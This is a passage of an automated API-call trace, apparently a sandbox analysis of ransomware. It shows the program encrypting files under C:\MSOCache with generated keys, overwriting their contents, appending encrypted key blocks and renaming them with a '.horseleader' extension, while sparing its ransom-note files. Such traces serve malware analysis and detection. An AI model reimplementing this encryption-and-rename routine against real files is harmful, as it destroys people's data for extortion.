lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.217] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0210.217] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.217] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xc7b88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.217] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.229] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0210.229] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.229] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.229] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0210.229] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0210.230] CloseHandle (hObject=0x21c) returned 1 [0210.230] GetProcessHeap () returned 0x780000 [0210.230] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0210.230] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.horseleader") returned 87 [0210.230] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.horseleader")) returned 1 [0210.231] GetProcessHeap () returned 0x780000 [0210.231] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0210.231] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85ab8b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x80760, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="dwdcw20.dll", cAlternateFileName="")) returned 1 [0210.231] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="Windows") returned -1 [0210.231] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 78 [0210.231] StrStrIW (lpFirst="dwdcw20.dll", lpSrch=".horseleader") returned 0x0 [0210.231] lstrcmpW (lpString1="dwdcw20.dll", lpString2="#Decrypt#.txt") returned 1 [0210.231] lstrcmpW (lpString1="dwdcw20.dll", lpString2="_uninstalling_.png") returned 1 [0210.231] lstrlenW (lpString=".testttjffg") returned 11 [0210.231] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll", lpSrch=".testttjffg") returned 0x0 [0210.231] 
CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0210.231] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0210.232] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0210.232] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 78 [0210.232] StrStrW (lpFirst="dwdcw20.dll", lpSrch=".txt") returned 0x0 [0210.232] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=526176) returned 1 [0210.232] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.232] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.832] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0210.832] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.832] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3dbb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.832] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, 
nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.628] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.628] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.629] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x7b760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.629] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.631] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.631] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.631] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.632] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0211.632] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0211.632] 
CloseHandle (hObject=0x21c) returned 1 [0211.632] GetProcessHeap () returned 0x780000 [0211.632] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0211.632] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.horseleader") returned 90 [0211.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.horseleader")) returned 1 [0211.633] GetProcessHeap () returned 0x780000 [0211.633] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0211.633] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85f73a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7eda0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="dwtrig20.exe", cAlternateFileName="")) returned 1 [0211.633] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="Windows") returned -1 [0211.633] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 79 [0211.634] StrStrIW (lpFirst="dwtrig20.exe", lpSrch=".horseleader") returned 0x0 [0211.634] lstrcmpW (lpString1="dwtrig20.exe", lpString2="#Decrypt#.txt") returned 1 [0211.634] lstrcmpW 
(lpString1="dwtrig20.exe", lpString2="_uninstalling_.png") returned 1 [0211.634] lstrlenW (lpString=".testttjffg") returned 11 [0211.634] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe", lpSrch=".testttjffg") returned 0x0 [0211.634] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0211.634] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0211.634] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0211.634] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 79 [0211.634] StrStrW (lpFirst="dwtrig20.exe", lpSrch=".txt") returned 0x0 [0211.635] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=519584) returned 1 [0211.635] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.635] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.641] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.642] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.642] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3ced0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.642] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.654] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.654] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.655] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x79da0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.655] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.670] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.670] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.670] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.670] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, 
lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0211.671] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0211.671] CloseHandle (hObject=0x21c) returned 1 [0211.671] GetProcessHeap () returned 0x780000 [0211.671] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0211.671] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.horseleader") returned 91 [0211.672] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.horseleader")) returned 1 [0211.672] GetProcessHeap () returned 0x780000 [0211.672] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0211.672] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d646800, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8d646800, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x741, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Microsoft.VC90.CRT.manifest", cAlternateFileName="MICROS~1.MAN")) returned 1 [0211.672] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="Windows") returned -1 [0211.673] wnsprintfW (in: 
pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0211.673] StrStrIW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".horseleader") returned 0x0 [0211.673] lstrcmpW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="#Decrypt#.txt") returned 1 [0211.673] lstrcmpW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="_uninstalling_.png") returned 1 [0211.673] lstrlenW (lpString=".testttjffg") returned 11 [0211.673] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpSrch=".testttjffg") returned 0x0 [0211.673] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0211.673] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0211.673] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0211.674] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0211.674] StrStrW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".txt") returned 0x0 [0211.674] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1857) returned 1 [0211.674] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x741, lpOverlapped=0x0) 
returned 1 [0211.700] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff8bf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.700] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x741, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x741, lpOverlapped=0x0) returned 1 [0211.700] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.700] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0211.701] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0211.701] CloseHandle (hObject=0x21c) returned 1 [0211.701] GetProcessHeap () returned 0x780000 [0211.701] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0211.701] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.horseleader") returned 106 [0211.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.horseleader")) returned 1 [0211.702] GetProcessHeap () returned 
0x780000 [0211.702] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0211.702] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c333b00, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8c333b00, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe86b5a80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa0200, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="msvcr90.dll", cAlternateFileName="")) returned 1 [0211.702] lstrcmpiW (lpString1="msvcr90.dll", lpString2="Windows") returned -1 [0211.702] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 78 [0211.703] StrStrIW (lpFirst="msvcr90.dll", lpSrch=".horseleader") returned 0x0 [0211.703] lstrcmpW (lpString1="msvcr90.dll", lpString2="#Decrypt#.txt") returned 1 [0211.703] lstrcmpW (lpString1="msvcr90.dll", lpString2="_uninstalling_.png") returned 1 [0211.703] lstrlenW (lpString=".testttjffg") returned 11 [0211.703] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll", lpSrch=".testttjffg") returned 0x0 [0211.703] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0211.703] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0211.703] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0211.703] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 78 [0211.703] StrStrW (lpFirst="msvcr90.dll", lpSrch=".txt") returned 0x0 [0211.703] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=655872) returned 1 [0211.703] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.704] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.721] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.722] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.722] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4d900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.722] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.837] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.838] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.838] 
